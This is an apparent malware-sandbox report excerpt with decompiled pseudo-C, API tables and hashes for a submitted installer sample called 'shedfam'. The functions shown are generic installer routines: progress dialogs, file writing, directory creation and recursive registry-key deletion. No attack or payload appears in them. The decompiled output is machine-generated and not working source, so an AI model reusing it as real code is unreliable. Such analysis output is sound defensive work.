0x00404075
0x0040407c
0x0040407f
0x00404082
0x00404084
0x00404084
0x0040408c
0x00404092
0x00404092
0x0040409c
0x004040a1
0x004040a4
0x004040a9
0x004040ac
0x004040ac
0x004040bc
0x004040bc
0x00000000

APIs

GetWindowLongA.USER32 ref: 0040403B
GetSysColor.USER32(00000000), ref: 00404057
SetTextColor.GDI32(?,00000000), ref: 00404063
SetBkMode.GDI32(?,?), ref: 0040406F
GetSysColor.USER32(?), ref: 00404082
SetBkColor.GDI32(?,?), ref: 00404092
DeleteObject.GDI32(?), ref: 004040AC
CreateBrushIndirect.GDI32(?), ref: 004040B6

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
Instruction ID: 6c3acea846b2bea6830d2fc4e13120c874811c96ebe523463579326edd4eeab8
Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
Instruction Fuzzy Hash: AC2184B1904704ABC7319F78DD08B4B7BF8AF41714F048629EA95F22E0C734E904CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402692 Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402692(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A0C(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E0040585B(_t52) == 0) {
					E00402A0C(0xffffffed);
				}
				E004059B3(_t52);
				_t27 = E004059D2(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f94;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403207(_t47);
						E004031D5(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402F2E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405993( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402F2E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x00402692
0x00402694
0x004026a0
0x004026a3
0x004026ad
0x004026b1
0x004026b1
0x004026b7
0x004026c4
0x004026cc
0x004026cf
0x004026d5
0x004026e3
0x004026e8
0x004026ec
0x004026ef
0x004026f8
0x00402704
0x00402708
0x0040270b
0x00402715
0x00402734
0x0040271c
0x00402721
0x00402729
0x0040272c
0x00402731
0x00402731
0x0040273b
0x0040273b
0x0040274d
0x00402754
0x00402766
0x00402766
0x0040276c
0x0040276c
0x00402777
0x00402778
0x0040277c
0x00402780
0x00402786
0x00402786
0x0040278d
0x0040217a
0x004028a4
0x004028b0

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
GlobalFree.KERNEL32 ref: 0040273B
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
GlobalFree.KERNEL32 ref: 00402754
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
Instruction ID: 9ca97f70dd32fe41b4909f681106d09eb720980563b4c140891508526f153775
Opcode Fuzzy Hash: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
Instruction Fuzzy Hash: 2331AD71C00028BBDF216FA5DE88DAE7E79EF05364F10023AF920762E1C77919409F99

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE7 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FE7(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424034;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D1D(0, _t39, 0x41fd58, 0x41fd58, _a4);
					}
					_t26 = lstrlenA(0x41fd58);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423748, 0x41fd58);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd58;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd58)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd58, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404fed
0x00404ff9
0x00404ffc
0x00405002
0x0040500e
0x00405011
0x00405014
0x0040501a
0x0040501a
0x00405020
0x00405028
0x0040502b
0x00405048
0x0040504c
0x00405055
0x00405055
0x0040505f
0x00405068
0x00405074
0x0040507b
0x0040507f
0x00405082
0x00405095
0x004050a3
0x004050a3
0x004050a7
0x004050a9
0x004050ac
0x00000000
0x004050ac
0x0040502d
0x00405035
0x0040503d
0x00405043
0x00000000
0x00405043
0x0040503d
0x0040502b
0x004050b6

APIs

lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
SendMessageA.USER32 ref: 0040507B
SendMessageA.USER32 ref: 00405095
SendMessageA.USER32 ref: 004050A3

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
Instruction ID: e3991c5cb709e07264e8487875a2ca594626b649f9c95e4975d9101e96294db0
Opcode Fuzzy Hash: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
Instruction Fuzzy Hash: 0A21AC71900508BBDF11AFA4CC849DFBFB9EF44354F10803AF504B62A0C2398E808FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402BE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BE9(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41712c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41712c = 0;
					return _t15;
				}
				__eflags =  *0x41712c; // 0x0
				if(__eflags != 0) {
					return E004060C3(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423f8c;
				if(_t6 >  *0x423f8c) {
					__eflags =  *0x423f88;
					if( *0x423f88 == 0) {
						_t7 = CreateDialogParamA( *0x423f80, 0x6f, 0, E00402B51, 0);
						 *0x41712c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424034 & 0x00000001;
					if(( *0x424034 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BCD());
						return E00404FE7(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bf5
0x00402bf7
0x00402bfe
0x00402c01
0x00402c01
0x00402c07
0x00000000
0x00402c07
0x00402c0f
0x00402c15
0x00000000
0x00402c18
0x00402c1f
0x00402c25
0x00402c2b
0x00402c2d
0x00402c33
0x00402c71
0x00402c7a
0x00000000
0x00402c7f
0x00402c35
0x00402c3c
0x00402c4d
0x00000000
0x00402c5b
0x00402c3c
0x00402c87

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402C01
GetTickCount.KERNEL32 ref: 00402C1F
wsprintfA.USER32 ref: 00402C4D

Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 0040507B
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 00405095
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 004050A3

CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C71
ShowWindow.USER32(00000000,00000005), ref: 00402C7F

Part of subcall function 00402BCD: MulDiv.KERNEL32(000D050E,00000064,?), ref: 00402BE2

Strings

... %d%%, xrefs: 00402C47

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
Instruction ID: c64e3f0d3b0757b6abccf377c05ef7dd5a4a2d15633f5d7fd60a106f882d1610
Opcode Fuzzy Hash: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
Instruction Fuzzy Hash: F701CC30909215A7E7216FA0AF4DE9E7778A709701750803BFA01B11D0D2F855458BAE

Uniqueness

Uniqueness Score: -1.00%

Function 004048B6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004048B6(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x004048c4
0x004048d1
0x004048d7
0x00404915
0x00404915
0x00404924
0x0040492b
0x00000000
0x0040492d
0x004048d9
0x004048e8
0x004048f0
0x004048f3
0x00404905
0x0040490b
0x00404912
0x00000000
0x00404912
0x00000000

APIs

SendMessageA.USER32 ref: 004048D1
GetMessagePos.USER32 ref: 004048D9
ScreenToClient.USER32 ref: 004048F3
SendMessageA.USER32 ref: 00404905
SendMessageA.USER32 ref: 0040492B

Strings

f, xrefs: 00404907

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
Instruction ID: 15d2046a7114e84a1294b603ac72faee52eeac06783d2b716c70649c054a36c5
Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
Instruction Fuzzy Hash: B0014071D00219BADB00DBA4DC45BFFBBBCAB99711F10412ABB10B62D0D7B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BCD();
					_t19 = "unpacking data: %d%%";
					if( *0x423f90 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b5e
0x00402b6c
0x00402b72
0x00402b72
0x00402b80
0x00402b82
0x00402b8e
0x00402b93
0x00402b95
0x00402b95
0x00402ba0
0x00402bb0
0x00402bc2
0x00402bc2
0x00402bca

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B6C
wsprintfA.USER32 ref: 00402BA0
SetWindowTextA.USER32(?,?), ref: 00402BB0
SetDlgItemTextA.USER32 ref: 00402BC2

Strings

unpacking data: %d%%, xrefs: 00402B8E, 00402B9E
verifying installer: %d%%, xrefs: 00402B95

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
Instruction ID: 5842f070d0ba5c42680e32cc71ffb7420e94a61e96bc0cd7dd222547cc7ec007
Opcode Fuzzy Hash: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
Instruction Fuzzy Hash: 63F01D70900209ABEF206F60DD0ABEE3B79AB00305F00803AFA16B51D1D7B8AA558F59

Uniqueness

Uniqueness Score: -1.00%

Function 004054A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054A9(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407310;
				_v36.Group = 0x407310;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407300;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004054b4
0x004054b8
0x004054bb
0x004054c1
0x004054c5
0x004054c9
0x004054d1
0x004054d8
0x004054de
0x004054e5
0x004054f4
0x004054f6
0x00000000
0x004054f6
0x00405500
0x00405507
0x0040551d
0x00000000
0x00000000
0x00000000
0x0040551f
0x00405523

APIs

CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004054EC
GetLastError.KERNEL32 ref: 00405500
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405515
GetLastError.KERNEL32 ref: 0040551F

Strings

C:\Users\user\Desktop, xrefs: 004054A9

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-1669384263
Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
Instruction ID: c62c2996f9e34dce87800cf524906665c2ca46c28120acb5782fde5c5d27446b
Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
Instruction Fuzzy Hash: 2C010871D04219EAEF119FA5D9047EFBBB8EF04355F00457AE905B6180D378A644CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402A4C Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x424030 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A4C(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406087(4);
					if(_t27 == 0) {
						if( *0x424030 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x424030, 0);
				}
				return _t18;
			}

0x00402a6d
0x00402a75
0x00402a9d
0x00402a87
0x00402ad7
0x00402add
0x00000000
0x00402adf
0x00402a9b
0x00000000
0x00000000
0x00402a9b
0x00402ab2
0x00402aba
0x00402ac1
0x00402aed
0x00000000
0x00000000
0x00402af5
0x00402afd
0x00000000
0x00000000
0x00000000
0x00402afd
0x00000000
0x00402ad0
0x00402ae4

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
RegCloseKey.ADVAPI32(?), ref: 00402AB2
RegCloseKey.ADVAPI32(?), ref: 00402AD7
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
Instruction ID: 0b2809d2fb64695319acfce79e26d11160b3b4f997347cbf6297b20c5f533aea
Opcode Fuzzy Hash: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
Instruction Fuzzy Hash: B3117F71A00009FFDF21AF90DE48DAF7B79EB44384B104076FA05B00A0DBB49E51AF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x004028a4
0x004028b0

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32 ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
Instruction ID: bd69cf0b23442afaa5089e63738db4ddecc40c485a2e91d601a614859fd6190e
Opcode Fuzzy Hash: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
Instruction Fuzzy Hash: 79F0FF72A04114AFDB00EBA4DD88DAFB77CFB44305B044536F601F6191C7789D419B79

Uniqueness

Uniqueness Score: -1.00%

